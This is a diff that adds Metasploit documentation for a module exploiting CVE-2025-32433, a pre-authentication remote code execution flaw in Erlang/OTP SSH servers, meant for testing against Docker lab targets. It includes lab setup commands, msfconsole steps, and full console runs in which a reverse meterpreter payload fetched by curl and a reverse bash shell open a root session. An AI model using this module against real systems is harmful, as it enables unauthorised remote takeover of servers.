|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +Erlang/OTP is a set of libraries for the Erlang programming language. |
| 4 | + |
| 5 | +Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker |
| 6 | +to perform unauthenticated remote code execution (RCE). |
| 7 | + |
| 8 | +By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access |
| 9 | +to affected systems and execute arbitrary commands without valid credentials. This issue is patched in |
| 10 | +versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. |
| 11 | + |
| 12 | +### Introduction |
| 13 | + |
| 14 | +This module detect and exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH |
| 15 | +servers that allows remote command execution. By sending crafted SSH packets, it executes a payload to |
| 16 | +establish a reverse shell on the target system. |
| 17 | + |
| 18 | +The exploit leverages a flaw in the SSH protocol handling to execute commands via the Erlang `os:cmd` |
| 19 | +function without requiring authentication. |
| 20 | + |
| 21 | +## Testing |
| 22 | + |
| 23 | +### Vulnerable application |
| 24 | + |
| 25 | +Execute the following commands: |
| 26 | + |
| 27 | +```bash |
| 28 | +git clone https://github.com/ProDefense/CVE-2025-32433 |
| 29 | +cd CVE-2025-32433 |
| 30 | +docker build -t cve-ssh:latest . |
| 31 | +docker run -d -p 2222:2222 cve-ssh:latest |
| 32 | +``` |
| 33 | + |
| 34 | +### Patched application |
| 35 | + |
| 36 | +Execute the following commands: |
| 37 | + |
| 38 | +```bash |
| 39 | +git clone https://github.com/exa-offsec/ssh_erlangotp_rce |
| 40 | +cd ssh_erlangotp_rce/patched |
| 41 | +docker build -t patched-ssh:latest . |
| 42 | +docker run -d -p 2223:2223 patched-ssh:latest |
| 43 | +``` |
| 44 | + |
| 45 | +## Verification Steps |
| 46 | + |
| 47 | +1. Start msfconsole |
| 48 | +2. Do: `use exploit/linux/ssh/ssh_erlangotp_rce` |
| 49 | +3. Do: `set RHOSTS [IP]` |
| 50 | +4. Do: `run` |
| 51 | + |
| 52 | +## Scenarios |
| 53 | + |
| 54 | +### Using linux commands (Target 0) |
| 55 | + |
| 56 | +Use the linux commands CMD. |
| 57 | + |
| 58 | +``` |
| 59 | +msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options |
| 60 | +
|
| 61 | +Module options (exploit/linux/ssh/ssh_erlangotp_rce): |
| 62 | +
|
| 63 | + Name Current Setting Required Description |
| 64 | + ---- --------------- -------- ----------- |
| 65 | + RHOSTS 192.168.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 66 | + RPORT 2222 yes The target port (TCP) |
| 67 | + SSH_IDENT SSH-2.0-OpenSSH_8.9 yes SSH client identification string sent to the server |
| 68 | +
|
| 69 | +Payload options (cmd/linux/https/x64/meterpreter/reverse_tcp): |
| 70 | +
|
| 71 | + Name Current Setting Required Description |
| 72 | + ---- --------------- -------- ----------- |
| 73 | + FETCH_CHECK_CERT false yes Check SSL certificate |
| 74 | + FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) |
| 75 | + FETCH_DELETE false yes Attempt to delete the binary after execution |
| 76 | + FETCH_FILELESS false yes Attempt to run payload without touching disk, Linux ≥3.17 only |
| 77 | + FETCH_SRVHOST no Local IP to use for serving payload |
| 78 | + FETCH_SRVPORT 8080 yes Local port to use for serving payload |
| 79 | + FETCH_URIPATH no Local URI to use for serving payload |
| 80 | + LHOST 192.168.0.1 yes The listen address (an interface may be specified) |
| 81 | + LPORT 4444 yes The listen port |
| 82 | +
|
| 83 | + When FETCH_FILELESS is false: |
| 84 | +
|
| 85 | + Name Current Setting Required Description |
| 86 | + ---- --------------- -------- ----------- |
| 87 | + FETCH_FILENAME tVzpeXtmX no Name to use on remote system when storing payload; cannot contain spaces or slashes |
| 88 | + FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces |
| 89 | +
|
| 90 | +Exploit target: |
| 91 | +
|
| 92 | + Id Name |
| 93 | + -- ---- |
| 94 | + 0 Linux Command |
| 95 | +
|
| 96 | +View the full module info with the info, or info -d command. |
| 97 | +
|
| 98 | +msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run |
| 99 | +[*] Started reverse TCP handler on 192.168.0.1:4444 |
| 100 | +[*] 192.168.0.1:2222 - Running automatic check ("set AutoCheck false" to disable) |
| 101 | +[*] 192.168.0.1:2222 - Starting scanner for CVE-2025-32433 |
| 102 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT... |
| 103 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN... |
| 104 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)... |
| 105 | +[+] 192.168.0.1:2222 - The target is vulnerable. |
| 106 | +[*] 192.168.0.1:2222 - Starting exploit for CVE-2025-32433 |
| 107 | +[+] 192.168.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7 |
| 108 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT... |
| 109 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN... |
| 110 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)... |
| 111 | +[+] 192.168.0.1:2222 - Payload sent successfully |
| 112 | +[*] Sending stage (3045380 bytes) to 172.17.0.2 |
| 113 | +[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 172.17.0.2:35770) at 2025-04-27 20:23:02 +0400 |
| 114 | +
|
| 115 | +meterpreter > |
| 116 | +``` |
| 117 | + |
| 118 | +### Using unix commands (Target 1) |
| 119 | + |
| 120 | +Use the unix commands CMD. |
| 121 | + |
| 122 | +``` |
| 123 | +msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options |
| 124 | +
|
| 125 | +Module options (exploit/linux/ssh/ssh_erlangotp_rce): |
| 126 | +
|
| 127 | + Name Current Setting Required Description |
| 128 | + ---- --------------- -------- ----------- |
| 129 | + RHOSTS 192.168.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 130 | + RPORT 2222 yes The target port (TCP) |
| 131 | + SSH_IDENT SSH-2.0-OpenSSH_8.9 yes SSH client identification string sent to the server |
| 132 | +
|
| 133 | +Payload options (cmd/unix/reverse_bash): |
| 134 | +
|
| 135 | + Name Current Setting Required Description |
| 136 | + ---- --------------- -------- ----------- |
| 137 | + LHOST 192.168.0.1 yes The listen address (an interface may be specified) |
| 138 | + LPORT 4444 yes The listen port |
| 139 | +
|
| 140 | +Exploit target: |
| 141 | +
|
| 142 | + Id Name |
| 143 | + -- ---- |
| 144 | + 1 Unix Command |
| 145 | +
|
| 146 | +View the full module info with the info, or info -d command. |
| 147 | +
|
| 148 | +msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run |
| 149 | +[*] Started reverse TCP handler on 192.168.0.1:4444 |
| 150 | +[*] 192.168.0.1:2222 - Running automatic check ("set AutoCheck false" to disable) |
| 151 | +[*] 192.168.0.1:2222 - Starting scanner for CVE-2025-32433 |
| 152 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT... |
| 153 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN... |
| 154 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)... |
| 155 | +[+] 192.168.0.1:2222 - The target is vulnerable. |
| 156 | +[*] 192.168.0.1:2222 - Starting exploit for CVE-2025-32433 |
| 157 | +[+] 192.168.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7 |
| 158 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT... |
| 159 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN... |
| 160 | +[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)... |
| 161 | +[+] 192.168.0.1:2222 - Payload sent successfully |
| 162 | +[*] Command shell session 1 opened (192.168.0.1:4444 -> 172.17.0.2:59042) at 2025-04-27 20:24:41 +0400 |
| 163 | +
|
| 164 | +whoami |
| 165 | +root |
| 166 | +``` |
| 167 | + |
| 168 | +## References |
| 169 | + |
| 170 | +1. <https://x.com/Horizon3Attack/status/1912945580902334793> |
| 171 | +2. <https://platformsecurity.com/blog/CVE-2025-32433-poc> |
| 172 | +3. <https://github.com/ProDefense/CVE-2025-32433> |
0 commit comments